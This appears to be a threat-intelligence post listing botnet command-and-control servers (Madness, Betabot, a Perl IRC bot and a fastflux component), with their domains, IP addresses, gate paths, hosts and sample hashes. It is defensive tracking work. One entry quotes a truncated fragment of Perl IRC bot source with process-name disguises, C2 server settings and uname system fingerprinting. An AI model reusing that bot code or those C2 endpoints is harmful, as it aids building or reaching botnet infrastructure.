ajw555.myjino.ru (Madness DDOS botnet hosted by avguro.com)

Resolved ajw555.myjino.ru to 81.177.141.241 Server:  ajw555.myjino.ru Gate file:  /index.php This is the same domain as the previous madness botnet. Hosting info: http://whois.domaintools.com/81.177.141.241 Related md5s (Download sample from Malwr.com) Madness: c45034111810d1a56ba6b72acc63bdf5

perl.jorgee.nu(5k perl bots hosted in Germany Hurth Intergenia Ag)

Credits to AliSs. $p = “”; for ($k=0;$k<1300;$k++) { $p .= “,5-$k”; } my @ps = (“ps”,”syslogd”,”init”); my $processo = $ps[rand scalar @ps]; $servidor=’perl.jorgee.nu’ unless $servidor; my $porta=’8080′; my @canais=(“#perl”); my @adms=(“M”,”st0n3d”,”x00″,”Jack”); my $linas_max=10; my $sleep=5; my $nick = getnick(); my $ircname = “x00”; my $realname = `uname -vr`; my $uname = `uname -a`; my

shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)

Resolved shatteredwow.com to 63.143.49.122 Server:  shatteredwow.com Gate file:  /beta2/order.php Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com Hosting info: http://whois.domaintools.com/63.143.49.122 Related md5s (Download sample from Malwr.com) Betabot: e5a03d368fd4fca8b45c83a05dab6ced

nomoguz.su (Betabot http botnet hosted by fastflux)

Server:  nomoguz.su Gate file:  /SDF9his/yefgvrtu.php Alternate domain: cooncatcher245.com The same fastflux setup is also hosting this betabot. Hosting infos: ;; QUESTION SECTION: ;nomoguz.su. IN A ;; ANSWER SECTION: nomoguz.su. 131 IN A 5.165.17.205 nomoguz.su. 131 IN A 176.194.193.47 nomoguz.su. 131 IN A 66.231.16.101 nomoguz.su. 131 IN A 145.255.33.9 nomoguz.su. 131 IN A 188.0.98.100 nomoguz.su. 131

nigazz.com (Betabot http botnet hosted by besthosting.ua)

Resolved nigazz.com to 194.28.173.217 Server:  nigazz.com Gate file:  /neg/order.php Alterenate domain: niggazz.com Hosting infos: http://whois.domaintools.com/194.28.173.217 Related md5s (Download sample from Malwr.com) Betabot: 7355a0c56919550566ca50e33162f993

fpsfreedom.net (Betabot http botnet hosted by alibabahost.com)

Resolved fpsfreedom.net to 37.221.170.65 Server:  fpsfreedom.net Gate file:  /order.php This seems to be used for increasing website and video stream views, opening up the page hxxp://www.fpsguides.com/hidden in three hidden internet explorer windows. Hosting infos: http://whois.domaintools.com/37.221.170.65 Related md5s (Download sample from Malwr.com) Betabot: 8cc7c93530430201871f07f1be3a26e6

goodfluxetcwow1.com (Fastflux hosting botnet hosted by mnogobyte.ru)

Resolved goodfluxetcwow1.com to 146.255.195.104 Server:  goodfluxetcwow1.com Gate file:  /forum/7f4765027f274bbc95328d79fa668b75.php Alternate domains: goodfluxetcwow2.com b437571f9061b10e5d33c66c83df359e.ru This is the malware component of a fastflux hosting setup. Once installed on a computer it opens a web server on port 80 and a DNS server on port 53. Current IPs used by the setup hxxp://goodfluxetcwow1.com/system/http.php Page showing example forwarding hxxp://goodfluxetcwow1.com/system/test.php